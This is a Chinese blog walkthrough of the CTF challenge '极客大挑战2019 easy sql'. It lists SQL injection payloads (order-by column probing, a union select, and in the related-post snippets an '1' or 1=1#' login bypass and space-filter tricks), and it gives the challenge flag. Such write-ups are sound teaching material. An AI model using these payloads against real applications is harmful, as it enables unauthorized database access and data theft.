极客大挑战2019——easy sql

最新推荐文章于 2024-08-28 08:07:32 发布

S0Monk

最新推荐文章于 2024-08-28 08:07:32 发布

阅读量3.4k

点赞数 1

分类专栏：极客大挑战文章标签： web安全 sql

本文链接：https://blog.csdn.net/qq_44308327/article/details/121540003

版权

极客大挑战专栏收录该内容

3 篇文章 0 订阅

订阅专栏

既然是sql注入，那就按照注入流程来

1、先找注入类型

payload：?username=admin&password=1
payload：?username=admin&password=2-1 //判断页面是否相同

两次注入结构页面相同，由此判断为整形注入

2、找回显位

payload：?username=admin&password=1' order by 3%23
payload：?username=admin&password=1' order by 4%23

输入3页面没变化，输入4页面报错，所以回显位为3

3、构造注入语句

payload：?username=admin&password=1' union select 1,2,database()%23

很好，啥过滤机制都没有，测试了一下直接就拿到了flag

flag{dbfd0784-f217-4b77-a43a-0bf131025152}

总结：

这道题还是挺容易的，关于sql注入题只要按照注入流程来就可以了

在能用union联合查询的情况下，最好还是用union联合查询

如有不足之处，请予指正！

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

S0Monk

关注关注

1
点赞
踩
1

收藏

觉得还不错? 一键收藏
打赏
1
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

专栏目录

Spring Cloud 微服务开发：入门、进阶与源码剖析 —— 14.2 Spring Cloud Alibaba Seata 概述

极客挖掘机

04-14

910

14.2 Spring Cloud Alibaba Seata 概述上一节我们介绍了什么是分布式事务以及目前的一些设计方案存在的缺陷，本节我们介绍Spring Cloud Alibaba对分布式事务的解决方案——Spring Cloud Alibaba Seata。 14.2.1发展历程 2014 年，阿里中间件团队发布 TXC（Taobao Transaction Constructor），为...

[网络安全自学篇] 八十.WHUCTF之WEB类解题思路WP（代码审计、文件包含、过滤绕过、SQL注入）

杨秀璋的专栏

05-29

1万+

这是作者网络安全自学教程系列，主要是关于安全工具和实践操作的在线笔记，特分享出来与博友们学习，希望您喜欢，一起进步。前文分享了Windows PE病毒，包括PE病毒原理、分类及感染方式详解，并通过案例进行介绍。这篇文章将介绍WHUCTF部分题目，第一次参加CTF，还是能学到很多东西。下面分享四个我完成的WEB类型题目的解题过程，希望对您有所帮助。本来感觉能做出6道题目，但有两道题卡在某个点，后面几天忙于其他事情，就没再参加。人生路上，要珍惜好每一天与家人陪伴的日子。感谢武汉大学，感谢网安学院，感谢这些大佬

1 条评论您还未登录，请先登录后发表或查看评论

简易SQL----Easy

09-07

简单化SQL增删改查，支持Access数据库。可复制粘贴字段，方便写SQL语句。

easy_sql

qq_45951598的博客

11-23

1439

本次题目了来着ctf里的一道supersqli 这里加一个单引号发现报错这里orderby3就错了，发现只有两个字段。联合注入发现，有过滤

Easy SQL快速入门及实战指南

最新发布

gitblog_00470的博客

08-28

403

Easy SQL快速入门及实战指南 easy_sqlA library developed to ease the data ETL development process.项目地址:https://gitcode.com/gh_mirrors/ea/easy_sql 项目介绍 Easy SQL 是一个专为简化数据ETL(抽取、转换、加载)开发流程设计的库。它允许开发者以命令式的方式撰写SQL脚...

极客大挑战 Easy SQL 1

qq_51802152的博客

12-23

178

超级简单的一个web 注入题

[极客大挑战 2019]EasySQL

Sk1y的博客

12-18

541

[极客大挑战 2019]EasySQL 打开题目，是一个登录界面，在用户名中输入万能密码 1' or 1=1# 试一下，密码随意写就这样登录成功了！同时得到了flag{d94b525b-a323-4d69-b6b1-210a8e824572} 然后又试了一下，用户名和密码中只要有一个是1' or 1=1#,就可以登录成功。上述是实际解法，如果想要更加了解原理的话，推荐一个师傅的wp——绕圈子的解法这个师傅讲得很透彻！！！ ...

2401_84264096的博客

05-03

1104

例如输入1)、1"、1-等，这些数字后面的字符不是闭合符，所以数据库会把这些输入的错误数据转换成正确的数据类型。但是，若输入的数字后面的字符恰好是闭合符，则会形成闭合。原理：当闭合字符遇到转义字符时，会被转义，那么没有闭合符的语句就不完整了，就会报错，通过报错信息我们就可以推断出闭合符。时，没有SQL语句报错，只是提示我们输入的值是不对的，因此我们可以先假设SQL语句闭合方式是单引号。分析报错信息：看\斜杠后面跟着的字符，是什么字符，它的闭合字符就是什么，若是没有，就为数字型。可知此页面与数据库产生交互。

Buuctf-Web-[极客大挑战 2024]EasySQL 1 题解及思路总结(1)

2401_84281594的博客

04-28

776

（但是在本题中有两个变量，这个方法不太适用）

CSDN前1000名博主

热门推荐

无知人生，记录点滴

05-26

8万+

博主简介 stpeace 排名：1 原创：2166 粉丝：7180 积分：181660 等级：10stpeace的专栏中国本博客供大家交流，欢迎各抒己见。博文中的内容禁止用 yuanmeng001 排名：2 原创：5286 粉丝：10660 积分：170616 等级：10袁萌专栏无穷小微积分倡导者–北大教授null老师 yjclsx 排名：3 原创：162...

easysql插件

02-24

eclipse的插件

Easysql

weixin_43610673的博客

03-04

760

无in注表名无union select和字段名注数据 Fuzz测试过滤的关键词有： union *** select join information_schema in or and sleep benchmark if sys.schema_auto_increment_columns 因为过滤了in所以常用查询表名的方法不能用了常用：information_schema，mysql.i...

[极客大挑战 2019]LoveSQL

qq_42404383的博客

08-10

388

文章目录[极客大挑战 2019]LoveSQL题目：**分析：**解题：总结： [极客大挑战 2019]LoveSQL 题目：存在注入点分析：手动注入、尝试 ’ or 1 = 1; # 得到账户密码 admin cc084c3d58c1ecc212d9b4ff3f84aa4c 登录后还是没有我们想要的东西，所以现在就是要利用SQL注入从而获取表里数据解题：接下来就是按sql注入的流程操作： 1.测试有多少字段使用order by 字段数为3 2.爆出当前数据库名和身

CTF-Web-[极客大挑战2019]EasySQL

归子莫的博客

05-02

2669

CTF-Web-[极客大挑战2019]EasySQL 博客说明文章所涉及的资料来自互联网整理和个人总结，意在于个人学习和经验汇总，如有什么地方侵权，请联系本人删除，谢谢！本文仅用于学习与交流，不得用于非法用途！ CTP平台网址 https://buuoj.cn/challenges 题目 Web类，[极客大挑战2019]EasySQL 打开题目的实例思路题目类型是Web类型的，而且...

[SWPUCTF 2021 新生赛]easy_sql

qq_56301349的博客

07-15

3954

[SWPUCTF 2021 新生赛]easy_sql

easy_sql解析

qq_73722777的博客

03-08

453

获得列名，但是其中不包含flag项。先尝试打开username和password列查看数据。进入页面，我们看到网页标题为管理员后台，尝试使用万能密码进行登录。回显输入为3时可以正常登录，回显为4显示错误，推测回显位为3。登录后发现登录成功，网页有回显，尝试进行sql注入。网址回显错误，猜测空格被屏蔽，使用/**/代替尝试。获得表名为bighacker，users。爆数据后未发现flag，于是尝试从另一个表入手。获得库名为yunxi_exam，进行爆表名。获得flag，此题结束。得到列名，尝试爆数据。

极客大挑战 2019]EasySQL

09-03

EasySQL 是极客大挑战 2019 中的一个题目，它是一个简单的 SQL 数据库查询题目。可以通过编写 SQL 查询语句来实现对给定的数据库表进行数据查询和分析。在 EasySQL 中，你将面对一个包含不同表的数据库，你需要...